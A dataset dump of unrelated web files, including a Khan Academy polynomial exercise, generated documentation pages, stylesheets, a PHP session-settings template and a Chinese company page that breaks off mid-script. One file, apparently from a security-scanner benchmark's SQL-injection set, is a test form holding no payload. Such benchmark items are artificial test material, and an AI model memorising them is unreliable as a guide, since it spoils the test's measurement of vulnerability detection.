path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
wp-content/plugins/khan-exercises/khan-exercises/exercises/multiplying_polynomials.html | lakefernmontessoriacademy/LFMA-Wordpress | <!DOCTYPE html>
<html data-require="math math-format polynomials functional">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Multiplying polynomials</title>
<script src="../khan-exercise.js"></script>
</head>
<body>
<div class="exercise">
<div class="vars">
<var id="X">randVar()</var>
<var id="COLORS">[ BLUE, ORANGE, GREEN ]</var>
<var id="MAX_DEGREE">4</var>
<var id="NON_ZERO_INDICES" data-ensure="( NON_ZERO_INDICES[ 0 ].length !== 3 || NON_ZERO_INDICES[ 1 ].length !== 3 ) && ( NON_ZERO_INDICES[ 0 ].length !== 1 || NON_ZERO_INDICES[ 1 ].length !== 1 )">tabulate( function() {
return randRangeUniqueNonZero( 0, MAX_DEGREE, randRange(1, 3) ).sort().reverse();
}, 2 )</var>
<var id="POL_1, POL_2">tabulate( function(n) {
var coefs = [];
for ( var i = 0; i <= MAX_DEGREE; i++ ) {
var value = 0;
for ( var j = 0; j < NON_ZERO_INDICES[ n ].length; j++ ) {
if ( i === NON_ZERO_INDICES[ n ][ j ] ) {
value = randRangeNonZero( -7, 7 );
break;
}
}
coefs[ i ] = value;
}
return new Polynomial( 0, MAX_DEGREE, coefs, X );
}, 2 )</var>
<var id="LIKE_TERMS">function() {
var likeTerms = [];
var counter = 0;
var areLikeTerms = false;
for ( var i = POL_1.minDegree; i <= POL_1.maxDegree; i++ ) {
if ( POL_1.coefs[ i ] === 0 ) {
continue;
}
for ( var j = POL_2.minDegree; j <= POL_2.maxDegree; j++ ) {
if ( POL_2.coefs[ j ] === 0 ) {
continue;
}
if ( likeTerms[ i + j ] === undefined ) {
likeTerms[ i + j ] = "";
} else if ( likeTerms[ i + j ] === "" ) {
likeTerms[ i + j ] = COLORS[ counter++ ];
areLikeTerms = true;
}
}
}
return areLikeTerms ? likeTerms : false;
}()</var>
<var id="SOLUTION">POL_1.multiply( POL_2 )</var>
<var id="FAKE_SOLUTION_1, FAKE_SOLUTION_2">tabulate( function(n) {
var counter = 0;
var coefs = [];
for ( var i = 0; i < SOLUTION.coefs.length; i++ )
{
if ( SOLUTION.coefs[ i ] === 0 ) {
continue;
}
coefs[ i ] = SOLUTION.coefs[ i ] * ( n + counter++ % 2 === 0 ? 1 : -1 );
}
return new Polynomial( SOLUTION.minDegree, SOLUTION.maxDegree, coefs, SOLUTION.variable );
}, 2 )</var>
</div>
<div class="problems">
<div id="multiply">
<p class="question">Simplify the expression.</p>
<p class="problem"><code><span data-each="[ POL_1, POL_2 ] as POL" data-unwrap>(<var>POL</var>)</span></code></p>
<p class="solution"><code><var>SOLUTION</var></code></p>
<ul class="choices" data-show="4" data-none="true">
<li><code><var>SOLUTION.multiply( -1 )</var></code></li>
<li><code><var>FAKE_SOLUTION_1</var></code></li>
<li><code><var>FAKE_SOLUTION_2</var></code></li>
</ul>
</div>
</div>
<div class="hints">
<div>
<p>First use the distributive property.</p>
<code><span data-each="NON_ZERO_INDICES[ 0 ] as n1, index1"><span data-each="NON_ZERO_INDICES[ 1 ] as n2, index2"><var>( POL_1.coefs[ index1 ] < 0 ) ? "-" : ( n1 === 0 && n2 === 0 ) ? "" : "+"</var><var>abs( POL_1.coefs[ index1 ] ) === 1 ? "" : abs( POL_1.coefs[ index1 ] )</var><var>X</var>^<var>index1</var>(<var>( POL_2.coefs[ index2 ] === 1 ) ? "" : ( POL_2.coefs[ index2 ] === -1 ) ? "-" : POL_2.coefs[ index2 ]</var><var>X</var>^<var>index2</var>)</span></span></code>
</div>
<div>
<p>Simplify.</p>
<code data-if="LIKE_TERMS"><span data-each="NON_ZERO_INDICES[ 0 ] as n1, index1"><span data-each="NON_ZERO_INDICES[ 1 ] as n2, index2"><var>( POL_1.coefs[ index1 ] * POL_2.coefs[ index2 ] < 0 ) ? "-" : ( n1 === 0 && n2 === 0 ) ? "" : "+"</var><var>abs( POL_1.coefs[ index1 ] * POL_2.coefs[ index2 ] )</var><var>X</var>^{<var>index1 + index2</var>}</span></span></code>
<div data-else>
<code><var>SOLUTION</var></code>
<p>You're done!</p>
</div>
</div>
<div data-if="LIKE_TERMS">
<div>
<p>Identify like terms.</p>
<code><span data-each="NON_ZERO_INDICES[ 0 ] as n1, index1"><span data-each="NON_ZERO_INDICES[ 1 ] as n2, index2">\color{<var>LIKE_TERMS[ index1 + index2 ]</var>}{<var>( POL_1.coefs[ index1 ] * POL_2.coefs[ index2 ] < 0 ) ? "-" : ( n1 === 0 && n2 === 0 ) ? "" : "+"</var><var>abs( POL_1.coefs[ index1 ] * POL_2.coefs[ index2 ] )</var><var>X</var>^{<var>index1 + index2</var>}}</span></span></code>
</div>
<div>
<p>Add the coefficients.</p>
<p><code><span data-each="new Array( SOLUTION.getNumberOfTerms() ) as n, index">\color{<var>LIKE_TERMS[ SOLUTION.getCoefAndDegreeForTerm( n ).degree ]</var>}{<var>( SOLUTION.getCoefAndDegreeForTerm( n ).coef < 0 || n === 0 ) ? "" : "+"</var><var>expr( SOLUTION.expr()[ n + 1 ] )</var>}</span></code></p>
<p>You're done!</p>
</div>
</div>
</div>
</div>
</body>
</html>
|
User Guides/offline/comments/feed/index.html | yehaicao/THE7-CN-WWW.WORDPRESSLEAF.COM | <?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>
<channel>
<title>Offline User Guide » Page not found</title>
<atom:link href="http://guide.dream-theme.com/gen2/comments/feed/" rel="self" type="application/rss+xml" />
<link>http://guide.dream-theme.com/gen2</link>
<description>built on Nov. 23, 2013 (and probably outdated)</description>
<lastBuildDate>Sat, 23 Nov 2013 19:07:48 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>hourly</sy:updatePeriod>
<sy:updateFrequency>1</sy:updateFrequency>
<generator>http://wordpress.org/?v=3.7.1</generator>
</channel>
</rss>
|
commando/commando.html | inbi/msitools | <html>
<HEAD>
<TITLE> MSI Commando Help </TITLE>
<style>
body, button, input, p, td, select {font-family:Tahoma;font-size:11px}
optgroup {font-family:Tahoma;font-size:12px;font-weight:normal;font-style:normal}
button, input {background-color:white;}
a:hover{color:#000000}
a:visited{color:#000000}
.tabgray {border:1px solid black;border-top:none;background-color:#cccccc;font-weight:bold;}
.tabon {border:1px solid black;border-top:none;background-color:#eeeeee;font-weight:bold;}
.taboff {border:1px solid gray dashed;border-top:none;background-color:#ffffff;font-weight:normal;}
.gradient {filter: progid:DXImageTransform.Microsoft.Gradient(gradientType=1,startColorstr=#000099,endColorstr=#ccccff)}
</style>
</head>
<body id="body" style="background-color:white;margin-top:0;margin-right:0" link=#999999 vlink=#999999 alink=#999999>
<div style="position:absolute;left:0;top:0;width:640;height:60;background-color:#cbcbcb;color:#ffffff;padding:10" class="gradient">Flatbyte's
<div style="font-family:Trebuchet MS,Verdana;font-size:36px;font-weight:bold;filter:Glow(color=#000000,strength=5);width:100%">MSI COMMANDO
</div></div>
<br><br><br><br><br><br><br>
<div style="width:640">
<h3>Overview</h3>
MSI Commando is an applications to easily add and remove MSI packages to your Windows System.
Further you can change the state of selected features of the installed products.
Along with automation, log files creation and batchmode for installs and uninstalls this
is one handy tool for efficient adminitration of your software-installations.
<h3>Installing and starting the application</h3>
In fact, if you're reading this you've already installed the application.
Installation is very easy, just follow the instructions after starting the setup file.
After you start the application (either by clicking on the start menu shortcut or by launching
the appropriate executable) MSI Commando will start reading all folders beneath its homedirectory
and try to locate MSI packages.
<div>
</body>
</html>
|
src/main/webapp/sqli-05/BenchmarkTest02366.html | h3xstream/Benchmark | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="/benchmark/js/jquery.min.js"></script>
<script type="text/javascript" src="/benchmark/js/js.cookie.js"></script>
<title>BenchmarkTest02366</title>
</head>
<body>
<form action="/benchmark/sqli-05/BenchmarkTest02366" method="POST" id="FormBenchmarkTest02366">
<div><label>Please explain your answer:</label></div>
<br/>
<div><textarea rows="4" cols="50" id="BenchmarkTest02366Area" name="BenchmarkTest02366Area"></textarea></div>
<div><label>Any additional note for the reviewer:</label></div>
<div><input type="text" id="answer" name="answer"></input></div>
<br/>
<div><label>An AJAX request will be sent with a parameter value 'BenchmarkTest02366' and name:</label>
<input type="text" id="BenchmarkTest02366" name="BenchmarkTest02366" value="bar" class="safe"></input></div>
<div><input type="button" id="login-btn" value="Login" onclick="submitForm()"/></div>
</form>
<div id="ajax-form-msg1"><pre><code class="prettyprint" id="code"></code></pre></div>
<script>
$('.safe').keypress(function (e) {
if (e.which == 13) {
submitForm();
return false;
}
});
function submitForm() {
var text = $("#FormBenchmarkTest02366 input[id=BenchmarkTest02366]").val();
$("input.headerClass").remove();
$("<input type='hidden' value='BenchmarkTest02366' />")
.attr("id", text)
.attr("name", text)
.addClass("headerClass")
.appendTo("#FormBenchmarkTest02366");
var formData = $("#FormBenchmarkTest02366").serialize();
var URL = $("#FormBenchmarkTest02366").attr("action");
var xhr = new XMLHttpRequest();
xhr.open("POST", URL, true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE && xhr.status == 200) {
$("#code").text((xhr.responseText).decodeEscapeSequence());
} else {
$("#code").text("Error " + xhr.status + " " + xhr.statusText + " occurred.");
}
}
xhr.send(formData);
}
function escapeRegExp(str) {
return str.replace(/([.*+?^=!:${}()|\[\]\/\\])/g, "\\$1");
}
function replaceAll(str, find, replace) {
return str.replace(new RegExp(escapeRegExp(find), 'g'), replace);
}
String.prototype.decodeEscapeSequence = function() {
var txt = replaceAll(this,";","");
txt = replaceAll(txt,"&#","\\");
return txt.replace(/\\x([0-9A-Fa-f]{2})/g, function() {
return String.fromCharCode(parseInt(arguments[1], 16));
});
};
</script>
</body>
</html>
|
collect/Documentation/cluster_list.html | lucapaganotti/eiffel | <HTML>
<HEAD>
<META NAME="generator" CONTENT="ISE EiffelStudio version 15.01.9.6535 GPL Edition - linux-x86-64">
<meta name="keywords" content="Eiffel system"/>
<TITLE>collect alphabetical cluster list</TITLE>
<LINK REL="stylesheet" HREF="default.css" TYPE="text/css">
<SCRIPT TYPE="text/javascript" SRC="goto.html"></SCRIPT>
</HEAD>
<BODY>
<P ALIGN="CENTER">Automatic generation produced by ISE Eiffel</P>
<pre><FORM ONSUBMIT="go_to('',this.c.value);return false;">
<TABLE CELLSPACING="5" CELLPADDING="4"><TR>
<TD CLASS="link1"><A CLASS="link1" HREF="class_list.html">Classes</A></TD>
<TD CLASS="nolink1">Clusters</TD>
<TD CLASS="link1"><A CLASS="link1" HREF="cluster_hierarchy.html">Cluster hierarchy</A></TD>
<TD CLASS="link2">Go to: <INPUT NAME="c" VALUE=""></TD>
</TR></TABLE></FORM><SPAN CLASS="ekeyword">Clusters</SPAN>
<A CLASS="ecluster" HREF="collect/index.html">collect</A>
<FORM ONSUBMIT="go_to('',this.c.value);return false;">
<TABLE CELLSPACING="5" CELLPADDING="4"><TR>
<TD CLASS="link1"><A CLASS="link1" HREF="class_list.html">Classes</A></TD>
<TD CLASS="nolink1">Clusters</TD>
<TD CLASS="link1"><A CLASS="link1" HREF="cluster_hierarchy.html">Cluster hierarchy</A></TD>
<TD CLASS="link2">Go to: <INPUT NAME="c" VALUE=""></TD>
</TR></TABLE></FORM></pre>
<P ALIGN="CENTER"> -- Generated by ISE Eiffel --
<BR>For more details: <A HREF="http://www.eiffel.com">www.eiffel.com</A></P>
</BODY>
</HTML>
|
assets/shared/css/select.css | educatorplugin/educator | /* Select - Values ---------------*/
.edr-select-values {
display: block;
max-width: 250px;
}
.edr-select-values .selected-values:after,
.edr-select-choices .choices-filter:after {
color: #999;
display: block;
font-size: 15px;
font-family: 'dashicons';
position: absolute;
top: 6px;
right: 5px;
}
.edr-select-values .selected-values:focus,
.edr-select-choices .choices-filter input:focus {
box-shadow: none;
}
.edr-select-values .selected-values {
background: #f7f7f7;
border: 1px solid #ccc;
border-radius: 3px;
color: #555;
cursor: pointer;
display: block;
min-height: 24px;
padding: 1px 20px 1px 4px;
position: relative;
text-decoration: none;
}
.edr-select-values .selected-values:after {
content: '\f140';
line-height: 1;
top: 5px;
}
.edr-select-values .selected-value,
.edr-select-values .placeholder {
border: 1px solid transparent;
display: inline-block;
margin: 2px;
padding: 0 4px 0;
}
.edr-select-values .selected-value {
background: #fff;
border-color: #ccc;
padding-right: 16px;
position: relative;
}
.edr-select-values_open .selected-values {
border-bottom-color: transparent;
border-bottom-left-radius: 0;
border-bottom-right-radius: 0;
box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, .3);
}
.edr-select-values_disabled .selected-values {
color: #999;
cursor: default;
}
.edr-select-values .remove-value {
background: none;
border: 0;
color: #999;
cursor: pointer;
display: inline-block;
font-size: 18px;
font-weight: bold;
height: 16px;
line-height: 16px;
margin: 0;
padding: 0;
position: absolute;
right: 0;
text-align: center;
top: 1px;
vertical-align: middle;
width: 16px;
}
/* Select - Choices ---------------*/
.edr-select-choices {
background: #fff;
border: 1px solid #ccc;
border-top: 0;
border-radius: 0 0 3px 3px;
box-shadow: 0 1px 2px #ddd;
display: none;
margin: -1px 0 0 0;
position: absolute;
z-index: 100;
}
.edr-select-choices .choices-filter {
position: relative;
}
.edr-select-choices .choices-filter input {
border-left: 0;
border-right: 0;
margin: 0;
padding: 4px 24px 4px 10px;
width: 100%;
}
.edr-select-choices .choices-filter input:focus {
border-color: #ccc;
}
.edr-select-choices .choices-filter:after {
content: '\f179';
}
.edr-select-choices .choices-filter .edr-spinner {
background: #fff;
margin: -10px 0 0;
position: absolute;
right: 2px;
top: 50%;
z-index: 10;
}
.edr-select-choices .choices {
max-height: 209px;
overflow: auto;
}
.edr-select-choices .choices a {
border-top: 1px solid #ddd;
color: #555;
cursor: pointer;
display: block;
padding: 8px 10px;
}
.edr-select-choices .choices a:hover {
background: #f7f7f7;
}
.edr-select-choices .choices-not-found {
color: #999;
padding: 8px 10px;
}
.edr-select-choices .choices a:first-child {
border-top: 0;
}
.edr-select-choices .choices a:last-child {
border-radius: 0 0 3px 3px;
}
.edr-select-choices .choices .level-1 {
padding-left: 25px;
}
|
haik-contents/plugin/app_config/session.html | toiee/haik | <div class="page-header"><?php echo h($title) ?></div>
<section class="setting">
<h3 class="sub-header"><?php echo h($description) ?></h3>
<div class="panel">
<a href="#" class="close" data-dismiss="alert">×</a>
<p><strong>通常のServerでは設定の必要がありません</strong></p>
<p>サーバー側でセッションの保存先が正しく設定されていない場合、<?php echo APP_NAME ?>のログインができません。<br>
そこで、対処法として <?php echo APP_NAME ?> にセッションを保存します。<br>
</p>
<p>ログインは成功しているのに管理者ナビが表示されない場合、この設定を試してみてください。</p>
<p><?php echo APP_NAME ?> でのセッション保存先フォルダ:<?php echo CACHE_DIR ?></p>
</div>
<div class="container-fluid">
<ul class="setting_list">
<li>
<div class="row">
<div class="col-sm-3"><?php _e('セッションの保存先') ?></div>
<div class="col-sm-7 current"><?php echo ($session_save_path == '') ?__('未設定') : __('設定あり') ?></div>
<div class="col-sm-2 pull-right"><a href="#" class="pull-right" data-edit="session_save_path">編集</a></div>
</div>
</li>
</ul>
</div>
</section>
<script id="tmpl_conf_session_save_path" type="text/x-jquery-tmpl">
<div class="well">
<div class="alert">この設定をするには、管理者のメールアドレスとパスワードが必要です。</div>
<form action="?cmd=app_config_session" method="post" class=" form-horizontal">
<input type="hidden" name="cmd" value="app_config_session">
<input type="hidden" name="phase" value="save">
<div class="form-group">
<label class="col-sm-3 control-label" for=""><?php _e('メールアドレス') ?></label>
<div class="col-sm-9">
<input type="text" name="username" value="${username}" class="form-control" />
</div>
</div>
<div class="form-group">
<label class="col-sm-3 control-label" for=""><?php _e('パスワード') ?></label>
<div class="col-sm-5">
<input type="password" name="passwd" value="" class="form-control" />
</div>
</div>
{{if (session_save_path == '')}}
<input type="hidden" name="session_save_path" value="<?php h(CACHE_DIR) ?>" />
{{else}}
<input type="hidden" name="session_save_path" value="" />
{{/if}}
<div class="form-group">
<label for="" class="col-sm-3 control-label"></label>
<div class="col-sm-9">
<input type="submit" class="btn btn-primary" value="{{if (session_save_path == '') }}設定{{else}}解除{{/if}}" />
<input type="button" class="btn btn-default" value="<?php _e('キャンセル') ?>" data-dismiss="configblock" />
</div>
</div>
</form>
</div>
</script>
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/html/tryhtml_lists_nested.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<!-- Mirrored from www.w3schools.com/html/tryhtml_lists_nested.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:08:52 GMT -->
<body>
<h2>A Nested List</h2>
<ul>
<li>Coffee</li>
<li>Tea
<ul>
<li>Black tea</li>
<li>Green tea</li>
</ul>
</li>
<li>Milk</li>
</ul>
</body>
<!-- Mirrored from www.w3schools.com/html/tryhtml_lists_nested.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:08:52 GMT -->
</html> |
www/components/wodotexteditor/docs/files.html | mobwellacademy/librecademy | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>JsDoc Reference - File Index</title>
<meta name="generator" content="JsDoc Toolkit" />
<style type="text/css">
/* default.css */
body
{
font: 12px "Lucida Grande", Tahoma, Arial, Helvetica, sans-serif;
width: 800px;
}
.header
{
clear: both;
background-color: #ccc;
padding: 8px;
}
h1
{
font-size: 150%;
font-weight: bold;
padding: 0;
margin: 1em 0 0 .3em;
}
hr
{
border: none 0;
border-top: 1px solid #7F8FB1;
height: 1px;
}
pre.code
{
display: block;
padding: 8px;
border: 1px dashed #ccc;
}
#index
{
margin-top: 24px;
float: left;
width: 160px;
position: absolute;
left: 8px;
background-color: #F3F3F3;
padding: 8px;
}
#content
{
margin-left: 190px;
width: 600px;
}
.classList
{
list-style-type: none;
padding: 0;
margin: 0 0 0 8px;
font-family: arial, sans-serif;
font-size: 1em;
overflow: auto;
}
.classList li
{
padding: 0;
margin: 0 0 8px 0;
}
.summaryTable { width: 100%; }
h1.classTitle
{
font-size:170%;
line-height:130%;
}
h2 { font-size: 110%; }
caption, div.sectionTitle
{
background-color: #7F8FB1;
color: #fff;
font-size:130%;
text-align: left;
padding: 2px 6px 2px 6px;
border: 1px #7F8FB1 solid;
}
div.sectionTitle { margin-bottom: 8px; }
.summaryTable thead { display: none; }
.summaryTable td
{
vertical-align: top;
padding: 4px;
border-bottom: 1px #7F8FB1 solid;
border-right: 1px #7F8FB1 solid;
}
/*col#summaryAttributes {}*/
.summaryTable td.attributes
{
border-left: 1px #7F8FB1 solid;
width: 140px;
text-align: right;
}
td.attributes, .fixedFont
{
line-height: 15px;
color: #002EBE;
font-family: "Courier New",Courier,monospace;
font-size: 13px;
}
.summaryTable td.nameDescription
{
text-align: left;
font-size: 13px;
line-height: 15px;
}
.summaryTable td.nameDescription, .description
{
line-height: 15px;
padding: 4px;
padding-left: 4px;
}
.summaryTable { margin-bottom: 8px; }
ul.inheritsList
{
list-style: square;
margin-left: 20px;
padding-left: 0;
}
.detailList {
margin-left: 20px;
line-height: 15px;
}
.detailList dt { margin-left: 20px; }
.detailList .heading
{
font-weight: bold;
padding-bottom: 6px;
margin-left: 0;
}
.light, td.attributes, .light a:link, .light a:visited
{
color: #777;
font-style: italic;
}
.fineprint
{
text-align: right;
font-size: 10px;
}
</style>
</head>
<body>
<div id="header">
</div>
<div id="index">
<div align="center"><a href="index.html">Class Index</a>
| <a href="files.html">File Index</a></div>
<hr />
<h2>Classes</h2>
<ul class="classList">
<li><i><a href="symbols/_global_.html">_global_</a></i></li>
<li><a href="symbols/TextEditor.html">TextEditor</a></li>
<li><a href="symbols/Wodo.html">Wodo</a></li>
</ul>
<hr />
</div>
<div id="content">
<h1 class="classTitle">File Index</h1>
<div>
<h2><a href="symbols/src/wodotexteditor.js.html">wodotexteditor.js</a></h2>
<dl>
</dl>
</div>
<hr />
</div>
<div class="fineprint" style="clear:both">
Documentation generated by <a href="http://code.google.com/p/jsdoc-toolkit/" target="_blankt">JsDoc Toolkit</a> 2.4.0 on Wed Sep 17 2014 17:15:48 GMT+0200 (MESZ)
</div>
</body>
</html> |
giac/giac-1.5.0/doc/fr/cascmd_fr/cascmd_fr051.html | hiplayer/giac | <!DOCTYPE html>
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="generator" content="hevea 2.29+5 of 2017-05-18">
<link rel="stylesheet" type="text/css" href="cascmd_fr.css">
<title>Comment sélectionner</title>
</head>
<body >
<a href="cascmd_fr050.html"><img src="previous_motif.gif" alt="Previous"></a>
<a href="index.html"><img src="contents_motif.gif" alt="Up"></a>
<a href="cascmd_fr052.html"><img src="next_motif.gif" alt="Next"></a>
<hr>
<h3 id="sec74" class="subsection">2.2.2 Comment sélectionner</h3>
<p>
On peut sélectionner directement avec la souris ou avec les flèches
du bloc des flèches de direction.<br>
On peut aussi considérer une expression comme un arbre et parcourir
cet arbre à l’aide des flèches de direction.<br>
Quand une expression est sélectionnée on peut :
</p><ul class="itemize"><li class="li-itemize">
monter dans l’arbre en selectionnant le père avec la flèche vers
le haut,
</li><li class="li-itemize">descendre dans l’arbre en selectionnant le fils gauche avec la flèche
vers le bas,
</li><li class="li-itemize">selectionner le frère droit ou gauche avec la flèche vers la droite
ou vers la gauche,
</li><li class="li-itemize">échanger l’expression avec son frère avec <span style="font-family:monospace">Ctrl</span> et la flèche
vers la droite ou vers la gauche,<br>
</li><li class="li-itemize">supprimer un opérateur ou le nom d’une commande en sélectionnant
l’expression et en tapant : <span style="font-family:monospace">backspace</span>.
Il faut noter qu’un deuxième <span style="font-family:monospace">backspace</span> effacera les arguments
</li></ul><p>
<span style="font-weight:bold">Exemple</span>
On clique dans l’écran de l’éditeur d’expressions et on tape <span style="font-family:monospace">x+1</span> puis
flèche vers le
haut pour sélectionner <span style="font-family:monospace">x+1</span>, puis <span style="font-family:monospace">*</span> et on tape <span style="font-family:monospace">x+2</span> puis
flèche vers le haut pour sélectionner <span style="font-family:monospace">x+2</span> puis <span style="font-family:monospace">*</span> et on tape
<span style="font-family:monospace">x-1</span> puis flèche vers le haut pour sélectionner <span style="font-family:monospace">x-1</span>.<br>
On a alors dans l’écran de l’éditeur d’expressions l’expression
<span style="font-family:monospace">(x+1)*((x+2)*(x-1))</span>.
Puis on sélectionne le tout et on appuie sur <span style="font-family:monospace">eval</span> (menu
<span style="font-family:monospace">Expression</span>▸<span style="font-family:monospace">Autres</span> ou bouton <span style="font-family:monospace">eval</span> du clavier
si on a choisi <span style="font-family:monospace">Montrer-> Clavier</span> dans le menu <span style="font-family:monospace">Cfg</span>) pour avoir
les 3 facteurs sur le même plan (l’arbre n’est plus binaire).<br>
Donc maintenant on obtient :<br>
<span style="font-family:monospace">(x+1)*(x+2)*(x-1)</span>. <br>
On peut ensuite soit
</p><ul class="itemize"><li class="li-itemize">
sélectionner <span style="font-family:monospace">(x+1)*(x+2)</span> avec la souris puis on
sélectionne la commande <span style="font-family:monospace">normal</span> du menu <span style="font-family:monospace">Calc</span> sous-menu
<span style="font-family:monospace">Réecriture</span>.<br>
On obtient alors <span style="font-family:monospace">(x</span><code><span style="font-family:monospace">^</span></code><span style="font-family:monospace">2+3</span>·<span style="font-family:monospace"> x+2)</span>·<span style="font-family:monospace"> (x+2)</span>.
</li><li class="li-itemize">sélectionner <span style="font-family:monospace">x+1</span>, puis <span style="font-family:monospace">Ctrl</span> et la flèche vers la droite,
pour échanger <span style="font-family:monospace">x+1</span> et <span style="font-family:monospace">x+2</span>.<br>
Donc maintenant on obtient :<br>
<span style="font-family:monospace">(x+2)*(x+1)*(x-1)</span>. <br>
On peut ensuite sélectionner <span style="font-family:monospace">(x+1)*(x-1)</span> avec la souris puis on
sélectionne la commande <span style="font-family:monospace">normal</span> du menu <span style="font-family:monospace">Calc</span> sous-menu
<span style="font-family:monospace">Réecriture</span>.<br>
On obtient alors <span style="font-family:monospace">(x+2)*(x</span><code><span style="font-family:monospace">^</span></code><span style="font-family:monospace">2-1)</span>.
</li></ul>
<hr>
<a href="cascmd_fr050.html"><img src="previous_motif.gif" alt="Previous"></a>
<a href="index.html"><img src="contents_motif.gif" alt="Up"></a>
<a href="cascmd_fr052.html"><img src="next_motif.gif" alt="Next"></a>
</body>
</html>
|
Proyecto/estiloindex.css | LemmyKilmister/LND2017 | *{
margin:0px;
padding: 0px;
}
section{
display: flex;
flex-direction: column;
flex-grow: 1;
justify-content: space-around;
width:100%;
}
article{
background-color: darkred;
border:10px;
border-color: black;
width:33,3%
}
section #segundo{
border-bottom: 2px solid black;
}
#Titulo{
text-align: center;
background-color: floralwhite;
color:black;
padding-bottom: 10px;
padding-top: 10px;
}
#primero{
flex-grow: 1;
display: inline-block;
justify-content: space-around;
}
#Lista{
display: flex;
justify-content: space-around;
}
#segundo{
background-color:silver;
border:3px;
border-color: red;
}
#tercero{
background-color: silver;
}
#imagen{
display:flex;
justify-content: space-around;
margin-top:10px;
}
header p{
font-family: 'Crimson Text', serif;
font-size: 200%;
}
p{
margin:20px;
}
h1{
text-align: center;
font-size: 200%;
}
ul a{
background-color: floralwhite;
border-radius: 5px;
margin:15px;
padding:15px;
font-family:inherit;
text-decoration: none;
color:darkred;
border-color: black;
}
ul a:hover{
background-color: darkred;
color:floralwhite;
}
footer{
background-color:darkred;
color: silver;
text-align: center;
}
footer a{
color:silver;
}
section a:first-of-type{
border: 4px solid black;
}
@media screen and (max-width: 523px) {
section{
display:flex;
flex-grow: 1;
justify-content: space-around;
width: 33,3%
}
article, header, footer{
min-width: 522px;
}
#Lista{
display:flex;
flex-direction: column;
text-align: center;
}
} |
htdocs/stc/widgets/categorycommunities.css | apparentlymart/livejournal | .appwidget-categorycommunities .communities {
width: 100%;
}
.appwidget-categorycommunities .communities td {
vertical-align: top;
}
.appwidget-categorycommunities .communities tr.head {
background: #d6e6f5;
font-family: Arial;
font-weight: bold;
padding: 2px 4px 2px 4px;
border-bottom: 1px solid black;
}
.appwidget-categorycommunities .communities tr.head td {
padding: 2px 4px;
}
.appwidget-categorycommunities .communities td.userpic {
padding: 4px 2px 10px 10px;
background-color: #fff;
width: 50px;
}
.appwidget-categorycommunities .communities td.content {
padding: 2px 8px 2px 4px;
background-color: #fff;
}
.appwidget-categorycommunities .featured .collapsed-poster {
font-size: 11px;
padding: 0;
margin: 2px 0 7px 0;
}
.appwidget-categorycommunities .featured .collapsed-subject {
font-size: 11px;
padding: 0;
margin: 0;
}
.appwidget-categorycommunities tr.regular td {
border-top: 1px solid #ccc;
}
.appwidget-categorycommunities .collapsed-poster {
font-size: 11px;
padding: 0;
margin: 0 0 2px 5px;
}
.appwidget-categorycommunities .collapsed-subject {
font-size: 11px;
padding: 0;
margin: 0 0 0 15px;
}
.appwidget-categorycommunities .communities td.posted {
padding: 2px 8px 2px 4px;
background-color: #fff;
color: #666;
font-size: 11px;
}
|
a/zhishiku/hyzx/2014/1022/527.html | chuing/Push | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>如何加强生物育种知识产权保护?_广州谱式达-人力资源-知识产权-工商财税-人才服务-户口手续办理</title>
<meta name="description" content="广州谱式达人力资源服务有限公司。拥有多年工商注册-户口办理手续-户口手续办理-广州社保-广州公积金-人事代理-代理招聘-财税服务-ICP办理-商标注册-商标设计-专利业务-版权业务等经验,专业、免费为用户提供企业一条龙服务,广州户口,广州社保,广州公积金知识产权,内资注册,外资注册,专利版权等业务代办,办理请认准广州谱式达人力资源服务有限公司。" />
<meta name="keywords" content="广州谱式达,广州谱式达人力资源服务有限公司,工商注册,知识产权,办理户口手续,户口手续办理,广州户口手续办理,社保办理,公积金办理,代办工商财税,广州商标注册,企业服务,代理招聘" />
<link rel="stylesheet" type="text/css" href="/templets/css/a.css">
<link rel="stylesheet" type="text/css" href="/templets/css/style.css"/>
<link rel="stylesheet" type="text/css" href="/templets/css/global.css"/>
<script type="text/javascript" src="/templets/js/jquery.js"></script>
</head>
<body>
<div id="head"> <div id="body">
<div class="logo"><img src="/img/logo.png" alt="广州谱式达"/>
<div class="logotel">
<div id="nav">
<ul class="c">
<li><a href="/">首页</a></li>
<li><a href="/a/psd/" rel="12">关于我们</A></li>
<li><a href="/a/rcfw/" rel="61">人才服务</a></li>
<li><a href="/a/zscq/" rel="62">知识产权</a></li>
<li><a href="/a/qyfw/" rel="60">工商财税</a></li>
<li><a href="/a/zhishiku/" rel="81">晓·资讯</a></li>
<li><a href="/a/lxwm/" rel="64">联系我们</a></li>
</ul>
</div>
</div>
</div>
</div>
<SCRIPT type=text/javascript>
$(function(){
var _p = window.location.pathname;
$("#nav .c a").each(function(){
var _h=$(this).attr("href");
